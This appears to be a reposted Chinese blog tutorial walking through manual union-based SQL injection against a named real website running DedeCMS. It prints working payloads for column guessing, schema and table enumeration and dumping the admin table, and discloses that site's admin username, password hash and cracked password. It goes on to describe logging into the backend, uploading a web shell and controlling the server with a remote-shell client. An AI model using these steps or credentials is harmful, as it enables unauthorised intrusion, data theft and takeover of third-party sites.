博客已轉移到：PHP開發

注：此文章獻給那些還對注入不怎么理解的人學習！

找到注入點后猜字段，可用order by 1猜解，order by不可用時，可用union聯合查詢！

我這里猜解到的字段是22， 上圖：

接下來爆顯示位！語法: and 1=2 union select1,2,4,5,...,22 字段多少就輸入多少，中間太常，省略了！

然后回車打開，頁面出現了一個9的數字！如圖：

然后我們來查詢下是什么版本，用戶名，數據庫！

version() 版本database()當前數據庫 user() 用戶，要查詢什么就把剛才爆出9的顯示位替換掉，如圖：

這是版本號，如果要查詢用戶名就把瀏覽器上面的9替換成 user()就行了！

這是我查出來

版本號：5.1.32-community

數據庫：51teamcom

用戶名：51teamcom 數據庫和用戶名一樣！

接下來我們來報表了， 語法 ：FROM information_schema.TABLESwhere table_schema=database() limit 0，1 把瀏覽器里

的9改成 table_name ，然后回車，你就會看到表了，第一個表是：dede_addonarticle 我們只要爆出的管理員的表就行了！

我們繼續爆，每爆一個就得修改下這個語法 limit 0，1 爆第2個的時候把0改成1，比如：limit 1，1 爆第3個的時候繼續+1 如：limit 2，1 php中0是第一位！

這是我爆出來的表：

dede_addonproduct,dede_admin,dede_admintype,dede_arcatt,dede_arccache,dede_archives,dede_arcrank,dede_arctiny,ddede_arctype,dede_channeltype,dede_co_htmls,dede_co_mediaurls,dede_co_note,dede_co_urls,dede_diyforms,dede_feedback,dede_flink,dede_flinktype,dede_freelist,dede_guestbook,dede_homepageset

織夢的程序！

其中dede_admin 應該就是管理員的表了！我們爆下看！

爆之前，我們先把dede_admin 轉換成16進制的，就是這個 646564655F61646D696E

語法：information_schema.columns WHEREtable_name=0x646564655F61646D696E limit0，1 還是跟上面一樣，爆第幾個就修改數字 0 ，把我們剛才轉換的16進制放到0x后面，0x不要動，然后把顯示位9的數字改成 column_name 然后就行！

我爆的段：id,userid,pwd,uname,tname,email pwd應該就是密碼，uname應該是賬號，我們試試！

and 1=2 union select 1,2,3,4,5,6...,22 from dede_admin 把瀏覽器里面的語法全部去掉，剩***入點就行，就是這樣；

http://www.51team.cn/about.php?id=10 and 1=2 unionselect 1,2,3,4,5,6...,22 from dede_admin 然后回車！

然后把9替換成剛才我爆出來的字段 我替換了uname和pwd，開了2個瀏覽器！

用戶是：admin密碼是：d9d2b2de067864194059 密碼加密的，可到cmd5.com解密 如圖：

密碼解出來了，這個 bx2013 ，接下來找后臺，可以用軟件掃或者谷歌找！我找出來了：

成功登陸：

隨便找個上傳點就行，然后上傳馬，先掛個txt吧，嘿嘿！http://www.51team.cn/a.txt

接下來，***咯！

***可以上傳***馬，也可以用菜刀，我就用菜刀的吧，方便！隨便找個php文件添加一句話！

好，連接了

如果你是用網馬脫的話，就得看網站配置文件conn.php 里面的數據庫用戶名和密碼！

連接后，點網站列表，然后在網址那里右鍵點擊數據庫管理，然后打開一個窗口，那個窗口就是數據庫了！如圖：

與50位技術專家面對面20年技術見證，附贈技術全景圖

總結

以上是生活随笔為你收集整理的mysql手注_php+mysql手注拿shell教程【朋友给的】的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。